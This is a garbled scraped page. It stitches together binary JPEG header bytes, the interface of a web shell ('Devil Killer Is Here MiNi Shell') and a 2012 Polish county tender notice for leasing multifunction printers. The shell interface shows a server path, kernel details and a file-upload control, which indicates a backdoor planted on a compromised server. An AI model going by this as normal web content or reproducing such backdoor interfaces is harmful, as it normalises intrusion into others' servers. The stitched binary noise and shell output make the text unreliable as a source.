JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121205/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121205/492330-N-2012.html

<p class="kh_header"><b>Września: Przetarg nieograniczony na najem urządzeń wielofunkcyjnych z pełną obsługą serwisową wraz z papierem oraz na obsługę serwisową wraz z papierem urządzeń będących na wyposażeniu Zamawiającego.</b><br>
<b>Numer ogłoszenia: 492330 - 2012; data zamieszczenia: 05.12.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Starostwo Powiatowe , ul. Fryderyka Chopina 10, 62-300 Września, woj. wielkopolskie, tel. 061 6402051, 6404457, faks 061 6402051.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wrzesnia.powiat.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przetarg nieograniczony na najem urządzeń wielofunkcyjnych z pełną obsługą serwisową wraz z papierem oraz na obsługę serwisową wraz z papierem urządzeń będących na wyposażeniu Zamawiającego..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> I.	Urządzenia najmowane
Dostarczone urządzenia powinny być fabrycznie nowe, objęte gwarancją producenta. Urządzenia powinny być dostarczone wraz z aplikacją monitorująco-raportującą. 
Parametry urządzeń określone poniżej należy traktować jako wartości minimalne.
A.	Specyfikacja techniczna urządzeń:
1. Urządzenie wielofunkcyjne A4 - ilość szt. 9
Urządzenie wielofunkcyjne - kopiarka, drukarka, skaner
Prędkość druku 30 stron  min. A4
Czas nagrzewania 23 sekundy od włączenia
Czas wydruku pierwszej strony 5,4 sekundy
Rozdzielczość 600 dpi
Pamięć 1 GB RAM 128 GB HDD
Pojemność papieru kaseta na min. 250 kartek i podajnik ręczny na 100 kartek
Automatyczny dwustronny podajnik dokumentów na 50 oryginałów
Automatyczny druk dwustronny
Zoom 25procent- 400procentSortowanie elektroniczne
Kody użytkownika 1 000
Prędkość skanowania min. 30 stron min A4 mono kolor
Format skanowanych dokumentów pojedynczy  wielostronicowy PDF TIFF PDF o wysokim stopniu kompresji; JPEG
Skanowanie do USB  SMB  FTP  SD
Interfejsy Ethernet 10  100 Base-TX, USB
Język drukowania PCL5e, PCL6, Postscript 3
Dostarczone sterowniki producenta PCL 5e. PCL6, Postscript 3
Drukowanie z USB i SD format pliku PDF, TIFF, JPEG
Określenie godziny wydruku dokumentu wstrzymanego
Autoryzacja użytkowników z wykorzystaniem kodów PIN
Funkcjonalność drukowania:
-wstrzymane - zadanie druku jest przesyłane do drukarki, gdzie dane zostają zapisane na dysku twardym urządzenia, po zwolnieniu wydruku, zadania są automatycznie kasowane z dysku twardego, użytkownik zwalnia swoje zadania do druku po wybraniu swojej skrzynki, bez dodatkowej autoryzacji, 
-bezpieczne - zadanie druku jest przesyłane do drukarki, gdzie dane zostają zapisane na dysku twardym urządzenia, po zwolnieniu wydruku, zadania są automatycznie kasowane z dysku twardego, użytkownik zwalnia swoje zadania do druku po wybraniu swojej skrzynki, przed wydrukowaniem musi podać hasło do zadania, hasło do zadań może być ustalane indywidualnie,
-w trakcie drukowania inni użytkownicy mogą skanować, kopiować, zarządzać kolejnością drukowanych zadań (podczas drukowania zadań, inni użytkownicy mogą ingerować w kolejność drukowanych zadań)
-drukarka musi obsługiwać buforowanie zadań (przyjmowanie zadań i kolejkowanie przez urządzenie) i możliwość usuwania buforowanych zadań,
-każdy użytkownik może wydrukować wszystkie oczekujące zadania oraz drukować wybrane dokumenty, może usuwać dokumenty oczekujące na wydruk,
-każde wstrzymane i bezpieczne zadanie musi być możliwe do edycji w zakresie ustawienia wydruku dwustronnego, zmiany wydruku dwustronnego na jednostronne, ustawienie ilości stron do wydruku, 
2. Urządzenie wielofunkcyjne A3 - ilość szt. 2
Urządzenie wielofunkcyjne - kopiarka, skaner, drukarka
Prędkość druku 28 stron  min. A4
Minimalny format A3
Czas nagrzewania 14 sekund od włączenia
Czas wydruku pierwszej strony 4,5 sekundy
Rozdzielczość 600 dpi
Pamięć 1 GB RAM  120 GB HDD
Pojemność papieru kaseta na min. 550 kartek, kaseta na 500 kartek i podajnik ręczny na 100 kartek
Automatyczny dwustronny podajnik dokumentów na 50 oryginałów
Automatyczny druk dwustronny
Zoom 25procent- 400procentSortowanie elektroniczne
Kody użytkownika 500
Prędkość skanowania min. 50 stron  min A4 mono  min. 45 stron  min. A4 kolor
Format skanowanych dokumentów pojedynczy  wielostronicowy PDF  TIFF  PDF o wysokim stopniu kompresji; JPEG
Skanowanie do USB SMB  FTP  SD  NCP
Interfejsy Ethernet 10  100 Base-TX, USB
Język drukowania PCL5e, PCL6, Postscript 3
Dostarczone sterowniki producenta PCL 5e. PCL6, Postscript 3
Drukowanie z USB format pliku PDF, TIFF, JPEG
Autoryzacja użytkowników z wykorzystaniem kodów PIN
Funkcjonalność drukowania: 	
-wstrzymane - zadanie druku jest przesyłane do drukarki, gdzie dane zostają zapisane na dysku twardym urządzenia, po zwolnieniu wydruku, zadania są automatycznie kasowane z dysku twardego, użytkownik zwalnia swoje zadania do druku po wybraniu swojej skrzynki, bez dodatkowej autoryzacji, 
-bezpieczne - zadanie druku jest przesyłane do drukarki, gdzie dane zostają zapisane na dysku twardym urządzenia, po zwolnieniu wydruku, zadania są automatycznie kasowane z dysku twardego, użytkownik zwalnia swoje zadania do druku po wybraniu swojej skrzynki, przed wydrukowaniem musi podać hasło do zadania, hasło do zadań może być ustalane indywidualnie,
-w trakcie drukowania inni użytkownicy mogą skanować, kopiować, zarządzać kolejnością drukowanych zadań (podczas drukowania zadań, inni użytkownicy mogą ingerować w kolejność drukowanych zadań)
-drukarka musi obsługiwać buforowanie zadań (przyjmowanie zadań i kolejkowanie przez urządzenie) i możliwość usuwania buforowanych zadań,
-każdy użytkownik może wydrukować wszystkie oczekujące zadania oraz drukować wybrane dokumenty, może usuwać dokumenty oczekujące na wydruk,
3. Urządzenie wielofunkcyjne A3 kolorowe - ilość szt. 1
Urządzenie wielofunkcyjne - kopiarka, drukarka, skaner
Prędkość druku 30 stron  min. A4 monochromatycznych i kolorowych
Minimalny format A3
Czas nagrzewania 20 sekund od włączenia
Czas wydruku pierwszej strony 4,9 sekundy (mono) i 7,4 sekundy (kolor) 
Rozdzielczość 1 200 dpi
Pamięć 1,5 GB RAM  190 GB HDD
Pojemność papieru 2 kasety na min. 550 kartek i podajnik ręczny na 100 kartek
Automatyczny dwustronny podajnik dokumentów na 50 oryginałów
Automatyczny druk dwustronny
Zoom 25procent- 400procentSortowanie elektroniczne
Kody użytkownika 1 000
Prędkość skanowania min. 51 stron  min A4 mono  kolor
Format skanowanych dokumentów pojedynczy  wielostronicowy PDF  TIFF /PDF o wysokim stopniu kompresji; JPEG
Skanowanie do USB  SMB FTP SD NCP
Interfejsy Ethernet 10 100 Base-TX, USB
Język drukowania PCL5c, PCL6
Dostarczone sterowniki producenta PCL 5c. PCL6
Drukowanie z USB i SD format pliku PDF, TIFF, JPEG
Określenie godziny wydruku dokumentu wstrzymanego
Autoryzacja użytkowników z wykorzystaniem kodów PIN
Gramatura papieru 52 - 300 gm2 
Funkcjonalność drukowania 	
-wstrzymane - zadanie druku jest przesyłane do drukarki, gdzie dane zostają zapisane na dysku twardym urządzenia, po zwolnieniu wydruku, zadania są automatycznie kasowane z dysku twardego, użytkownik zwalnia swoje zadania do druku po wybraniu swojej skrzynki, bez dodatkowej autoryzacji, 
-bezpieczne - zadanie druku jest przesyłane do drukarki, gdzie dane zostają zapisane na dysku twardym urządzenia, po zwolnieniu wydruku, zadania są automatycznie kasowane z dysku twardego, użytkownik zwalnia swoje zadania do druku po wybraniu swojej skrzynki, przed wydrukowaniem musi podać hasło do zadania, hasło do zadań może być ustalane indywidualnie,
-w trakcie drukowania inni użytkownicy mogą skanować, kopiować, zarządzać kolejnością drukowanych zadań (podczas drukowania zadań, inni użytkownicy mogą ingerować w kolejność drukowanych zadań)
-drukarka musi obsługiwać buforowanie zadań (przyjmowanie zadań i kolejkowanie przez urządzenie) i możliwość usuwania buforowanych zadań,
-każdy użytkownik może wydrukować wszystkie oczekujące zadania oraz drukować wybrane dokumenty, może usuwać dokumenty oczekujące na wydruk,
-każde wstrzymane i bezpieczne zadanie musi być możliwe do edycji w zakresie ustawienia wydruku dwustronnego, zmiany wydruku dwustronnego na jednostronne, ustawienie ilości stron do wydruku, dla urządzeń kolorowych konwersja wydruku kolorowego na monochromatyczny,
 

4. Drukarka laserowa A4 - szt. 3
Technologia skanowania wiązką laserową, wydruk elektrofotograficzny i system dwuskładnikowego wywoływania
Prędkość drukowania ciągłego,36 wydruków na minutę (SEF A4)
Czas nagrzewania,Mniej niż 19 sekund
Pierwszy wydruk,Mniej niż 6,9 sekund
Procesor,466 MHz
Język drukarki,Standardowo,PCL5e, Pamięć 256 MB
Protokół sieciowy,TCPIP, 
Interfejs Ethernet 10 base-T/100 base-TX, USB 2.0, USB Host I/F
Maksymalne wymiary: 388 x 450 x 345 mm
B. Specyfikacja oprogramowania monitorująco - raportującego
Aplikacją monitorująco-raportująca dostarczana wraz z urządzeniami powinna posiadać następujące właściwości i funkcjonalności:
Aplikacja musi pracować w środowisku Windows, w zakresie wersji systemów operacyjnych: XP, 2000/2003 serwer, Vista, 2008 serwer, 2012 serwer, Windows 7, Windows 8.
Ze względów bezpieczeństwa aplikacja nie może być oparta na technologii www, tzn. nie jest dopuszczalne wykorzystywanie przeglądarki internetowej do wyświetlania interfejsu i komponentu/usługi IIS
Aplikacja musi posiadać własny silnik bazodanowy do  przechowywania listy użytkowników, struktur organizacyjnych, listy urządzeń i pobieranych danych z urządzeń drukujących.
Aplikacja musi zapewniać zarówno ręczny jak i automatyczny odczyt liczników użytkowników z urządzeń z możliwością dowolnego określenia godziny odczytu.
Aplikacja nie może wymagać ciągłego połączenia sieciowego z urządzeniami w celu odczytu liczników. Odczyty liczników mają być dokonywane raz na dobę, a w przypadku awarii sieci teleinformatycznej, historia użycia urządzeń przez użytkowników ma być przechowywana w ich pamięci do momentu przywrócenia połączenia sieciowego z jednostką serwera lub PC z zainstalowaną aplikacją. W takim przypadku odczyt liczników użytkowników powinien odbyć się automatycznie, zgodnie z ustalonym harmonogramem godzin odczytu bez jakiejkolwiek ingerencji administratora użytkownika. 
Moduł raportowy aplikacji musi zapewniać możliwość eksportu generowanych raportów do plików .csv, .xlsx, i .html
Aplikacja musi posiadać własny moduł raportowy z predefiniowanymi typami raportów zapewniającymi możliwość dowolnego określania dat granicznych raportu z dokładności do jednego dnia. Minimalne wymagane typy raportów są następujące:
-raport kosztów i ilości wydrukowanych stron na użytkownika z podziałem na mono i kolor
-raport kosztów i ilości wydrukowanych na urządzenie z podziałem na mono i kolor
-raport kosztów i ilości wydrukowanych na MPK czyli miejsce powstawania kosztu (dział, projekt itp.)  z podziałem na mono i kolor
-raport kosztów i ilości wydrukowanych na spółkę lub oddział z podziałem na mono i kolor
-raport kosztów i stanu liczników całkowitych/totalnych dla poszczególnych urządzeń.
Aplikacja musi automatycznie rejestrować w bazie programu użytkowników znajdujących się na urządzeniach, a których brak jest w samej aplikacji, bez konieczności ręcznego dodawania kont użytkowników w programie. Każdy użytkownik istniejący w pamięci dowolnego urządzenia musi automatycznie być importowany do aplikacji wraz z wartością liczników wykonanych prac. 
Aplikacja musi posiadać wszystkie występujące w niej interfejsy w języku polskim.
Zliczanie ilości wykonanych prac użytkowników nie może odbywać się poprzez monitoring kolejek drukowania na serwerze druku i stacjach roboczych.
Niedopuszczalna jest instalacja jakichkolwiek części systemu rozliczającego na stacjach roboczych. Część serwera rozwiązania musi być zainstalowana na dowolnym komputerze.
Aplikacja musi zapewnić maksymalną (blisko 100procent) dokładność faktycznie wydrukowanych stron przez użytkowników i nie może dopuszczać zliczania stron faktycznie niewydrukowanych, np. w przypadku anulowania wydruku w dowolnym momencie zliczone będą tylko strony faktycznie wydrukowane.
Do urządzeń należy przekazać 1 licencję na aplikację zapewniającą możliwość podłączenia minimum 10 urządzeń. Nie dopuszcza się osobnego licencjonowania poszczególnych modułów aplikacji (np. osobno moduł raportowy i osobno zarządzający). Licencja nie może być ograniczona czasowo.
Zamawiający na etapie wyboru oferty ma prawo weryfikacji funkcji systemu poprzez testy.

C. Specyfikacja oprogramowania skanującego
Na dwóch, wybranych przez Zamawiającego urządzeniach Wykonawca zainstaluje oprogramowanie skanujące o następujących parametrach:
Skanowanie PDF z OCR, skanowanie do docx, xls, xlsx, ppt, pptx, rtf, csv
Skanowanie z wykorzystaniem formularzy dla użytkowników przy skanowaniu do folderu, maila, ftp, drukarka, faks
Przeszukiwanie LDAP i ActiveDirectory w celu pobieranie informacji o użytkownikach,
Notyfikacja na e-mail o błędzie skanowania.


II.	Urządzenia będące na wyposażeniu Zamawiającego
Nazwa urządzenia	liczba użytkowanych urządzeń	Data rozpoczęcia użytkowania
Nashuatec MPC2500	1	23.12.2008r.
Brother MFC7440N	1	17.06.2010r.
Lexmark E420T	1	04.09.2004r.
Lexmark E120N	5	01.09.2010r.
OKI B430	3	01.09.2010r.
OKI B431D	4	18.11.2011r.

III. Wymagania dotyczące obsługi serwisowej, dostarczania materiałów eksploatacyjnych, części zamiennych, papieru, szkoleń, gwarancji itp.
Oferent zobowiązany jest do:
wykonywania obsługi serwisowej urządzeń będących przedmiotem umowy w sposób rzetelny, terminowy i zapewniający sprawne jego działanie,
podejmowania wynikających z obsługi serwisowej działań polegających na przeprowadzeniu ekspertyzy technicznej w siedzibie Zamawiającego, w terminie 8 godzin od odebrania od Zamawiającego pisemnego (lub telefonicznego w godz. od 7.00 do 15.00) zgłoszenia o konieczności dokonania konserwacji lub naprawy sprzętu oraz zakończenia ich w terminie 24 godzin od momentu rozpoczęcia naprawy,
bezpłatnego dostarczenia wszelkich części zamiennych niezbędnych do naprawy oraz materiałów eksploatacyjnych i papieru niezbędnych do prawidłowego działania urządzeń w terminie 8 godzin od momentu zgłoszenia zapotrzebowania,
nieodpłatnego użyczenia Zamawiającemu na cały czas trwania naprawy urządzenia zastępczego o tych samych lub nie gorszych parametrach, w przypadku gdy naprawa objętego umową urządzenia nie może zostać wykonana w terminie 16 godzin od momentu zgłoszenia awarii (urządzenie zastępcze musi zostać podłączone do sieci teleinformatycznej i skonfigurowane do bieżącej pracy przez Oferenta),
bezpłatnego, w okresie trwania umowy:
-przeszkolenia personelu Zamawiającego obsługującego urządzenia w dowolnym, wyznaczonym przez Zamawiającego terminie (zakres szkolenia i liczba godzin przeznaczona na szkolenie jest określana przez Zamawiającego, bez żadnych dodatkowych limitów),
-zapewnienia wsparcia w zakresie funkcjonowania urządzeń w środowisku informatycznym,
-ustawienia parametrów wydruku w środowisku informatycznym klienta,
-instalacji wymaganego przez sprzęt oprogramowania, w celu zapewnienia wykorzystania wszystkich funkcji najmowanych urządzeń,
-konfiguracji dostępu do urządzeń, wraz z przypisaniem praw dostępu,
-rozliczania ilości wykonanych stron przez poszczególnych pracowników,
-dokonania naprawy sprzętu we własnym lokalu serwisowym, o ile jest to uzasadnione rodzajem uszkodzenia, po uprzednim dostarczeniu sprzętu zastępczego,
-zapewnienia gwarancji najmowanych urządzeń wielofunkcyjnych w trakcie trwania umowy,
-zapewnienia serwisu pogwarancyjnego dla urządzeń Nashuatec MPC2500, Brother MFC7440N i Lexmark E420T,
-zapewnienia ubezpieczenia najmowanych urządzeń w trakcie trwania umowy..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 30.12.14.30-6, 30.23.21.10-8, 30.12.51.10-5, 30.12.43.00-7, 50.31.20.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2015.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> wadium nie jest wymagane</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten wykonawca spełni składając oświadczenie, którego wzór stanowi załącznik nr 2 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten będzie przez Wykonawcę spełniony, gdy wykaże, że wykonał w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres działalności jest krótszy - w tym okresie, co najmniej 2 dostawy o wartości nie mniejszej niż 100.000,00 zł brutto każda określone w opisie Przedmiotu zamówienia oraz załączy dokumenty potwierdzające, że dostawy te zostały wykonane lub są wykonywane należycie. Za odpowiadające przedmiotowi zamówienia uznane zostaną dostawy z minimum dwóch zrealizowanych umów na najem wraz z usługami serwisowymi  lub na dostawę urządzeń wielofunkcyjnych w kwocie nie mniejszej niż 100.000,00 zł brutto na każda z nich.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten wykonawca spełni składając oświadczenie, którego wzór stanowi załącznik nr 2 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten wykonawca spełni składając oświadczenie, którego wzór stanowi załącznik nr 2 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten wykonawca spełni składając oświadczenie, którego wzór stanowi załącznik nr 2 do SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie</li>

</ul>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje zmianę treści umowy w sytuacji zmiany wynagrodzenia na dany rok tj.
-w przypadku wyczerpania w danym roku kalendarzowym kwot określonych w § 3. ust. 2 umowy, wartość przedmiotu zamówienia dla tego roku może zostać zwiększona kosztem lat kolejnych, bez zwiększania ogólnej wartości przedmiotu umowy,
-w przypadku niewykorzystania w danym roku kalendarzowym kwot określonych w § 3. ust. 2 umowy, środki mogą zostać przesunięte na kolejne lata.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
